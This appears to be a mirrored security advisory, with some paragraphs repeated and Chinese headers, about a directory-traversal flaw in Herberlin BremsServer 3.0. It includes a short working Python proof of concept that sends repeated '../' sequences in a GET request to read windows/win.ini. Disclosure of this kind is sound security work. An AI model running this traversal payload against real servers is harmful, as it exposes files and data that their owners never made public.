Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .
source: http://www.securityfocus.com/bid/9493/info
Herberlin BremsServer is prone to a directory-traversal vulnerability. An attacker may exploit this issue to gain access to files residing outside the web server root directory of the affected system. This issue exists due to a failure to validate user specified URI input.
BremsServer 3.0 is vulnerable; other versions may also be affected.
# --PoC--
import socket
host = 'localhost'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('GET /' + '../' * 16 + 'windows/win.ini HTTP/1.1\r\n'
'Host: localhost\r\n\r\n')
print s.recv(8192)
BremsServer contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered by a failure to validate URLs that contain directory traversal characters, which will disclose arbitrary server file information resulting in a loss of confidentiality.
-
时间线
2004-01-26
2004-01-26
Unknow
Unknow
-
解决方案
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Herberlin BremsServer is prone to a directory-traversal vulnerability. An attacker may exploit this issue to gain access to files residing outside the web server root directory of the affected system. This issue exists due to a failure to validate user specified URI input.
BremsServer 3.0 is vulnerable; other versions may also be affected.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com